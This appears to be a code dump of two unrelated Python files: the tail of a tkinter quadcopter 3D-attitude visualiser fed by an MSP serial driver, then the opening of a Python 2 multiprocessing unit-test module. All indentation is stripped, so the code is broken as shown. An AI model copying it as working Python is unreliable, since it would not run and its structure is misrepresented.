[-width-armLength + propNarrowLength + propWidth, +farBU, -length-armLength - propNarrowLength + propWidth], #6 98
[-width-armLength + propNarrowLength - propWidth, +farBL, -length-armLength - propNarrowLength - propWidth], #7 99
#North East close wide
[-width-armLength + propShortLength - propWidth, +closeTL, -length-armLength - propShortLength - propWidth], #4 100
[-width-armLength + propShortLength + propWidth, +closeTU, -length-armLength - propShortLength + propWidth], #5 101
[-width-armLength + propShortLength + propWidth, +closeBU, -length-armLength - propShortLength + propWidth], #6 102
[-width-armLength + propShortLength - propWidth, +closeBL, -length-armLength - propShortLength - propWidth], #7 103
#Middle narrow tip
[-width-armLength - propNarrowWidth, +endT, -length-armLength - propNarrowWidth], #4 104
[-width-armLength + propNarrowWidth, +endT, -length-armLength + propNarrowWidth], #5 105
[-width-armLength + propNarrowWidth, +endB, -length-armLength + propNarrowWidth], #6 106
[-width-armLength - propNarrowWidth, +endB, -length-armLength - propNarrowWidth], #7 107
#South West close wide
[-width-armLength - propShortLength - propWidth, +closeTU, -length-armLength + propShortLength - propWidth], #4 108
[-width-armLength - propShortLength + propWidth, +closeTL, -length-armLength + propShortLength + propWidth], #5 109
[-width-armLength - propShortLength + propWidth, +closeBL, -length-armLength + propShortLength + propWidth], #6 110
[-width-armLength - propShortLength - propWidth, +closeBU, -length-armLength + propShortLength - propWidth], #7 111
#South West far wide
[-width-armLength - propNarrowLength - propWidth, +farTU, -length-armLength + propNarrowLength - propWidth], #4 112
[-width-armLength - propNarrowLength + propWidth, +farTL, -length-armLength + propNarrowLength + propWidth], #5 113
[-width-armLength - propNarrowLength + propWidth, +farBL, -length-armLength + propNarrowLength + propWidth], #6 114
[-width-armLength - propNarrowLength - propWidth, +farBU, -length-armLength + propNarrowLength - propWidth], #7 115
#South West far narrow tip
[-width-armLength - propLength - propNarrowWidth, +tipTU, -length-armLength + propLength - propNarrowWidth], #0 116
[-width-armLength - propLength + propNarrowWidth, +tipTL, -length-armLength + propLength + propNarrowWidth], #1 117
[-width-armLength - propLength + propNarrowWidth, +tipBL, -length-armLength + propLength + propNarrowWidth], #2 118
[-width-armLength - propLength - propNarrowWidth, +tipBU, -length-armLength + propLength - propNarrowWidth], #3 119
#creates prop 3 on arm 3
#North West far narrow tip
[+width+armLength - propLength - propNarrowWidth, +tipTU, -length-armLength - propLength + propNarrowWidth], #0 120
[+width+armLength - propLength + propNarrowWidth, +tipTL, -length-armLength - propLength - propNarrowWidth], #1 121
[+width+armLength - propLength + propNarrowWidth, +tipBL, -length-armLength - propLength - propNarrowWidth], #2 122
[+width+armLength - propLength - propNarrowWidth, +tipBU, -length-armLength - propLength + propNarrowWidth], #3 123
#North West far wide
[+width+armLength - propNarrowLength - propWidth, +farTU, -length-armLength - propNarrowLength + propWidth], #4 124
[+width+armLength - propNarrowLength + propWidth, +farTL, -length-armLength - propNarrowLength - propWidth], #5 125
[+width+armLength - propNarrowLength + propWidth, +farBL, -length-armLength - propNarrowLength - propWidth], #6 126
[+width+armLength - propNarrowLength - propWidth, +farBU, -length-armLength - propNarrowLength + propWidth], #7 127
#North West close wide
[+width+armLength - propShortLength - propWidth, +closeTU, -length-armLength - propShortLength + propWidth], #4 128
[+width+armLength - propShortLength + propWidth, +closeTL, -length-armLength - propShortLength - propWidth], #5 129
[+width+armLength - propShortLength + propWidth, +closeBL, -length-armLength - propShortLength - propWidth], #6 130
[+width+armLength - propShortLength - propWidth, +closeBU, -length-armLength - propShortLength + propWidth], #7 131
#Middle narrow tip
[+width+armLength - propNarrowWidth, +endT, -length-armLength + propNarrowWidth], #4 132
[+width+armLength + propNarrowWidth, +endT, -length-armLength - propNarrowWidth], #5 133
[+width+armLength + propNarrowWidth, +endB, -length-armLength - propNarrowWidth], #6 134
[+width+armLength - propNarrowWidth, +endB, -length-armLength + propNarrowWidth], #7 135
#South East close wide
[+width+armLength + propShortLength - propWidth, +closeTL, -length-armLength + propShortLength + propWidth], #4 136
[+width+armLength + propShortLength + propWidth, +closeTU, -length-armLength + propShortLength - propWidth], #5 137
[+width+armLength + propShortLength + propWidth, +closeBU, -length-armLength + propShortLength - propWidth], #6 138
[+width+armLength + propShortLength - propWidth, +closeBL, -length-armLength + propShortLength + propWidth], #7 139
#South East far wide
[+width+armLength + propNarrowLength - propWidth, +farTL, -length-armLength + propNarrowLength + propWidth], #4 140
[+width+armLength + propNarrowLength + propWidth, +farTU, -length-armLength + propNarrowLength - propWidth], #5 141
[+width+armLength + propNarrowLength + propWidth, +farBU, -length-armLength + propNarrowLength - propWidth], #6 142
[+width+armLength + propNarrowLength - propWidth, +farBL, -length-armLength + propNarrowLength + propWidth], #7 143
#South East far narrow tip
[+width+armLength + propLength - propNarrowWidth, +tipTL, -length-armLength + propLength + propNarrowWidth], #0 144
[+width+armLength + propLength + propNarrowWidth, +tipTU, -length-armLength + propLength - propNarrowWidth], #1 145
[+width+armLength + propLength + propNarrowWidth, +tipBU, -length-armLength + propLength - propNarrowWidth], #2 146
[+width+armLength + propLength - propNarrowWidth, +tipBL, -length-armLength + propLength + propNarrowWidth], #3 147
#creates prop 2 on arm 2
#North West far narrow tip
[-width-armLength - propLength - propNarrowWidth, +tipTU, +length+armLength - propLength + propNarrowWidth], #0 148
[-width-armLength - propLength + propNarrowWidth, +tipTL, +length+armLength - propLength - propNarrowWidth], #1 149
[-width-armLength - propLength + propNarrowWidth, +tipBL, +length+armLength - propLength - propNarrowWidth], #2 150
[-width-armLength - propLength - propNarrowWidth, +tipBU, +length+armLength - propLength + propNarrowWidth], #3 151
#North West far wide
[-width-armLength - propNarrowLength - propWidth, +farTU, +length+armLength - propNarrowLength + propWidth], #4 152
[-width-armLength - propNarrowLength + propWidth, +farTL, +length+armLength - propNarrowLength - propWidth], #5 153
[-width-armLength - propNarrowLength + propWidth, +farBL, +length+armLength - propNarrowLength - propWidth], #6 154
[-width-armLength - propNarrowLength - propWidth, +farBU, +length+armLength - propNarrowLength + propWidth], #7 155
#North West close wide
[-width-armLength - propShortLength - propWidth, +closeTU, +length+armLength - propShortLength + propWidth], #4 156
[-width-armLength - propShortLength + propWidth, +closeTL, +length+armLength - propShortLength - propWidth], #5 157
[-width-armLength - propShortLength + propWidth, +closeBL, +length+armLength - propShortLength - propWidth], #6 158
[-width-armLength - propShortLength - propWidth, +closeBU, +length+armLength - propShortLength + propWidth], #7 159
#Middle narrow tip
[-width-armLength - propNarrowWidth, +endT, +length+armLength + propNarrowWidth], #4 160
[-width-armLength + propNarrowWidth, +endT, +length+armLength - propNarrowWidth], #5 161
[-width-armLength + propNarrowWidth, +endB, +length+armLength - propNarrowWidth], #6 162
[-width-armLength - propNarrowWidth, +endB, +length+armLength + propNarrowWidth], #7 163
#South East close wide
[-width-armLength + propShortLength - propWidth, +closeTL, +length+armLength + propShortLength + propWidth], #4 164
[-width-armLength + propShortLength + propWidth, +closeTU, +length+armLength + propShortLength - propWidth], #5 165
[-width-armLength + propShortLength + propWidth, +closeBU, +length+armLength + propShortLength - propWidth], #6 166
[-width-armLength + propShortLength - propWidth, +closeBL, +length+armLength + propShortLength + propWidth], #7 167
#South East far wide
[-width-armLength + propNarrowLength - propWidth, +farTL, +length+armLength + propNarrowLength + propWidth], #4 168
[-width-armLength + propNarrowLength + propWidth, +farTU, +length+armLength + propNarrowLength - propWidth], #5 169
[-width-armLength + propNarrowLength + propWidth, +farBU, +length+armLength + propNarrowLength - propWidth], #6 170
[-width-armLength + propNarrowLength - propWidth, +farBL, +length+armLength + propNarrowLength + propWidth], #7 171
#South East far narrow tip
[-width-armLength + propLength - propNarrowWidth, +tipTL, +length+armLength + propLength + propNarrowWidth], #0 172
[-width-armLength + propLength + propNarrowWidth, +tipTU, +length+armLength + propLength - propNarrowWidth], #1 173
[-width-armLength + propLength + propNarrowWidth, +tipBU, +length+armLength + propLength - propNarrowWidth], #2 174
[-width-armLength + propLength - propNarrowWidth, +tipBL, +length+armLength + propLength + propNarrowWidth] #3 175
])
# Each face contains indices into points array above
faces = [(50,49,48,51),(59,51,48,56),(58,59,56,57), #top of the Box
(40,41,42,43),(41,45,46,42),(45,44,47,46),(44,40,43,47),(40,44,45,41),(43,42,46,47), #arrow Head
(32,33,34,35),(33,37,38,34),(37,36,39,38),(36,32,35,39),(32,36,37,33),(35,34,38,39), #arrow Body
(54,55,52,53),(54,53,61,62),(62,61,60,63),(48,49,55,54),(49,50,52,55),(50,51,53,52),(51,59,61,53),(59,58,60,61),(58,57,63,60),(57,56,62,63),(56,48,54,62), #rest of the box
(1,5,6,2),(5,4,7,6),(4,0,3,7),(0,4,5,1),(3,2,6,7), #arm 1
(9,13,14,10),(13,12,15,14),(12,8,11,15),(8,12,13,9),(11,10,14,15), #arm 2
(16,17,18,19),(17,21,22,18),(20,16,19,23),(16,20,21,17),(19,18,22,23), #arm 3
(24,25,26,27),(25,29,30,26),(28,24,27,31),(24,28,29,25),(27,26,30,31), #arm 4
(92,93,94,95),(93,97,98,94),(97,96,99,98),(96,92,95,99),(92,96,97,93),(95,94,98,99),(97,101,102,98),(101,100,103,102),(100,96,99,103),(96,100,101,97),(99,98,102,103),(101,105,106,102),(104,100,103,107),(100,104,105,101),(103,102,106,107),(105,109,110,106),(108,104,107,111),(104,108,109,105),(107,106,110,111),(109,113,114,110),(112,108,111,115),(108,112,113,109),(111,110,114,115),(113,117,118,114),(117,116,119,118),(116,112,115,119),(112,116,117,113),(115,114,118,119), #prop 4
(120,121,122,123),(121,125,126,122),(124,120,123,127),(120,124,125,121),(123,122,126,127),(125,129,130,126),(128,124,127,131),(124,128,129,125),(127,126,130,131),(129,133,134,130),(132,128,131,135),(128,132,133,129),(131,130,134,135),(133,137,138,134),(136,132,135,139),(132,136,137,133),(135,134,138,139),(137,141,142,138),(140,136,139,143),(136,140,141,137),(139,138,142,143),(141,145,146,142),(145,144,147,146),(144,140,143,147),(140,144,145,141),(143,142,146,147), #prop 3
(148,149,150,151),(149,153,154,150),(152,148,151,155),(148,152,153,149),(151,150,154,155),(153,157,158,154),(156,152,155,159),(152,156,157,153),(155,154,158,159),(157,161,162,158),(160,156,159,163),(156,160,161,157),(159,158,162,163),(161,165,166,162),(164,160,163,167),(160,164,165,161),(163,162,166,167),(165,169,170,166),(168,164,167,171),(164,168,169,165),(167,166,170,171),(169,173,174,170),(173,172,175,174),(172,168,171,175),(168,172,173,169),(171,170,174,175), #prop 2
(64,65,66,67),(65,69,70,66),(68,64,67,71),(64,68,69,65),(67,66,70,71),(69,73,74,70),(72,68,71,75),(68,72,73,69),(71,70,74,75),(73,77,78,74),(76,72,75,79),(72,76,77,73),(75,74,78,79),(77,81,82,78),(80,76,79,83),(76,80,81,77),(79,78,82,83),(81,85,86,82),(84,80,83,87),(80,84,85,81),(83,82,86,87),(85,89,90,86),(89,88,91,90),(88,84,87,91),(84,88,89,85),(87,86,90,91), #prop 1
]
lightGrey = '#72716d'
grey = '#665f59'
darkGrey ='#4c4641'
darkRed = '#993838'
red = 'red'
green = '#31e224'
darkGreen = '#2b7f24'
colors = [
lightGrey,lightGrey,lightGrey, #box Top
'red','red','red','red','red','red', #arrow head
'red','red','red','red','red','red' , #arrow body
lightGrey,lightGrey,lightGrey, #box bottom
grey,grey,grey, #box North
grey, #box East
grey,grey,grey, #box South
grey, #box West
lightGrey, grey, lightGrey, darkGrey, darkGrey, #arm 1
lightGrey, grey, lightGrey, darkGrey, darkGrey, #arm 2
grey, lightGrey, lightGrey, darkGrey, darkGrey, #arm 3
grey, lightGrey, lightGrey, darkGrey, darkGrey, #arm 4
#prop 4
darkGreen,darkGreen,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,darkGreen,
green,green,darkGreen,darkGreen,
green,green,darkGreen,darkGreen,
green,green,darkGreen,
darkGreen,green,green,darkGreen,
darkGreen,darkGreen,green,green,
#prop 3
darkGreen,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,green,
green,darkGreen,darkGreen,darkGreen,green,green,
#prop 2
darkRed,darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,darkRed,red,red,
#prop 1
darkRed,darkRed,darkRed,red,red,
darkRed,darkRed,red,red,
darkRed,darkRed,red,red,
darkRed,darkRed,red,
red,darkRed,darkRed,red,
red,darkRed,darkRed,darkRed,red,red,
]
return points, faces, colors
# Testing ==============================================================================================================
class MSPDriver(object):
def __init__(self, root, canvas):
self.root = root
self.canvas = canvas
self.fmuport = serial.Serial(FMUPORT, 115200)
# MSPPG
self.parser = msppg.MSP_Parser()
self.parser.set_ATTITUDE_Handler(self._attitude_message_handler)
self.request = msppg.serialize_ATTITUDE_Request()
self.yaw, self.pitch, self.roll = 0, 0, 0
thread = threading.Thread(target = self._read_fmu)
thread.daemon = True
thread.start()
self._send_request()
def _send_request(self):
self.fmuport.write(self.request)
def _read_fmu(self):
while True:
self.parser.parse(self.fmuport.read(1))
def _attitude_message_handler(self, x, y, z):
self.pitch = -y/10.
self.roll = x/10.
self.yaw = z
self._send_request()
def getYawPitchRoll(self):
return self.yaw, self.pitch, self.roll
if __name__ == "__main__":
width = 800
height = 800
root = tkinter.Tk()
root.geometry('%dx%d+%d+%d' % (width, height, 200, 200))
canvas = tkinter.Canvas(root, width=width, height=height, background='black')
driver = MSPDriver(root, canvas)
canvas.pack()
Display(driver, simulation=True).start()
tkinter.mainloop()
|
test_multiprocessing.py
|
#!/usr/bin/env python
#
# Unit tests for the multiprocessing package
#
import unittest
import threading
import Queue
import time
import sys
import os
import gc
import signal
import array
import copy
import socket
import random
import logging
# Work around broken sem_open implementations
try:
import multiprocessing.synchronize
except ImportError, e:
from test.test_support import TestSkipped
raise TestSkipped(e)
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
import _multiprocessing
from multiprocessing import util
#
#
#
latin = str
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.WARNING
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertTrue(isinstance(authkey, bytes))
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def _test(self, q, *args, **kwds):
current = self.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if self.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEquals(p.authkey, current.authkey)
self.assertEquals(p.is_alive(), False)
self.assertEquals(p.daemon, True)
self.assertTrue(p not in self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEquals(p.exitcode, None)
self.assertEquals(p.is_alive(), True)
self.assertTrue(p in self.active_children())
self.assertEquals(q.get(), args[1:])
self.assertEquals(q.get(), kwargs)
self.assertEquals(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEquals(q.get(), current.authkey)
self.assertEquals(q.get(), p.pid)
p.join()
self.assertEquals(p.exitcode, 0)
self.assertEquals(p.is_alive(), False)
self.assertTrue(p not in self.active_children())
def _test_terminate(self):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertTrue(p in self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertTrue(p not in self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertTrue(p not in self.active_children())
p.start()
self.assertTrue(p in self.active_children())
p.join()
self.assertTrue(p not in self.active_children())
def _test_recursion(self, wconn, id):
from multiprocessing import forking
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = self.Process(
target=self._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
def _test_put(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
def _test_get(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
def _test_fork(self, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
def _test_task_done(self, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
return
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
def f(self, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
def _test_event(self, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporaily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
#self.assertEqual(event.is_set(), False)
self.assertEqual(wait(0.0), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
# self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), None)
#
#
#
class _TestValue(BaseTestCase):
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def _test(self, values):
